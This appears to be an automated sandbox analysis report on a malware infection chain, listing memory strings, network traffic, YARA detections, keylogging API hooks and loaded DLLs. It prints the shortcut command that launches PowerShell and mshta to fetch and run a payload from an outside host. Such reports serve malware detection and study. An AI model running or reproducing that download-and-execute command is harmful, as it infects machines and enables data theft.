              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000006.00000002.2261109979.000001E850B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150689893.0000023D8A5A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
              Source: powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop
              Source: powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/ClassroomEc.exep
              Source: mshta.exe, 00000004.00000002.2037347752.00000270B5093000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2011262421.00000270B5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setup
              Source: powershell.exeString found in binary or memory: http://whitemansearch.shop/setup$global:?
              Source: mshta.exe, 00000004.00000003.2011262421.00000270B508C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B5090000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B5093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setup(
              Source: mshta.exe, 00000004.00000003.2011262421.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B50C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setup.
              Source: mshta.exe, 00000004.00000002.2037542726.00000270B511A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033778159.00000270B5119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033340330.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026672661.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2011262421.00000270B5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setup...
              Source: mshta.exe, 00000004.00000002.2037542726.00000270B511A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033778159.00000270B5119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033340330.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026672661.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2011262421.00000270B5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setup...JL
              Source: mshta.exe, 00000004.00000002.2037273373.00000270B5050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setup48
              Source: mshta.exe, 00000004.00000002.2037315824.00000270B5075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036767666.00000270B5075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setup9
              Source: forfiles.exe, 00000000.00000002.1997860800.0000022AC8480000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037273373.00000270B5050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupC:
              Source: mshta.exe, 00000004.00000002.2038065089.00000270B6B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupH
              Source: mshta.exe, 00000004.00000003.2011262421.00000270B508C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B5090000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B5093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupK
              Source: mshta.exe, 00000004.00000003.2011262421.00000270B508C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B5090000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B5093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupQ
              Source: mshta.exe, 00000004.00000003.2011262421.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B50C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupR
              Source: mshta.exe, 00000004.00000003.2032015087.00000278B749B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2030517718.00000278B748F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2031354234.00000278B7491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupX
              Source: forfiles.exe, 00000000.00000002.1997817259.0000022AC8470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupaProgramFil
              Source: mshta.exe, 00000004.00000003.2034272344.00000278B7503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setuphttp://whitemansearch.shop/setup
              Source: mshta.exe, 00000004.00000003.2033340330.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037468417.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026672661.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2011262421.00000270B5108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupl/Z
              Source: mshta.exe, 00000004.00000003.2011262421.00000270B50C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupouteHelper.dll
              Source: mshta.exe, 00000004.00000003.2036700238.00000278B74CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2039999977.00000278B74CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033752697.00000278B74CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupq
              Source: mshta.exe, 00000004.00000002.2037905939.00000270B52A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupt
              Source: mshta.exe, 00000004.00000003.2011262421.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B50C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setuptC:
              Source: mshta.exe, 00000004.00000002.2037273373.00000270B5050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://whitemansearch.shop/setupv3
              Source: powershell.exe, 00000006.00000002.2261109979.000001E85238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9B29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: powershell.exe, 00000008.00000002.2240816951.0000023DA2D70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2240816951.0000023DA2D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/2ZrVm4
              Source: powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2no.co/2ZrVm4;Set-ItemProperty
              Source: powershell.exe, 00000006.00000002.2261109979.000001E850B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150689893.0000023D8A5A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: svchost.exe, 00000005.00000003.2013768380.0000011ECA373000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 00000005.00000003.2013768380.0000011ECA300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000006.00000002.2261109979.000001E851735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: mshta.exe, 00000004.00000003.2033340330.00000270B5104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037468417.00000270B5104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2011262421.00000270B5104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026672661.00000270B5104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: powershell.exe, 00000006.00000002.2261109979.000001E85253E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2351092206.000001E860CB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2351092206.000001E860B82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000006.00000002.2261109979.000001E85238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000006.00000002.2261109979.000001E85238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49733 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D68CD0 SetWindowsHookExW 00000002,Function_00008B60,00000000,0000000012_2_00D68CD0
              Source: Identification.pif, 00000019.00000003.2990376919.0000000004BE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_c187b674-1
              Source: Identification.pif, 00000019.00000003.2990376919.0000000004BE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_0f8de507-d
              Source: Yara matchFile source: 25.3.Identification.pif.4be0000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.3.Identification.pif.4be0000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.3.Identification.pif.1e20000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000003.2990376919.0000000004BE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000003.2990182254.0000000001E20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Identification.pif PID: 8272, type: MEMORYSTR

              System Summary

              barindex
              Source: amsi64_7488.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7488, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial fileStrings: http://whitemansearch.shop/setupshell32.dll%wN
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\ClassroomEc.exeJump to dropped file
              Source: setup.lnkLNK file: /p C:\Windows\Vss /c "powershell start mshta http://whitemansearch.shop/setup
              Source: C:\Windows\SysWOW64\cmd.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487AD2C88_2_00007FF8487AD2C8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487CD3E08_2_00007FF8487CD3E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487A5F508_2_00007FF8487A5F50
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487ABA998_2_00007FF8487ABA99
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487AEAAB8_2_00007FF8487AEAAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487AE3188_2_00007FF8487AE318
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487BCEA08_2_00007FF8487BCEA0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487ADFE08_2_00007FF8487ADFE0
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D8803112_2_00D88031
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D8810B12_2_00D8810B
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D883A312_2_00D883A3
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D827F012_2_00D827F0
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pif F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
              Source: Producing.12.drStatic PE information: No import functions for PE file found
              Source: Producing.12.drStatic PE information: Data appended to the last section found
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
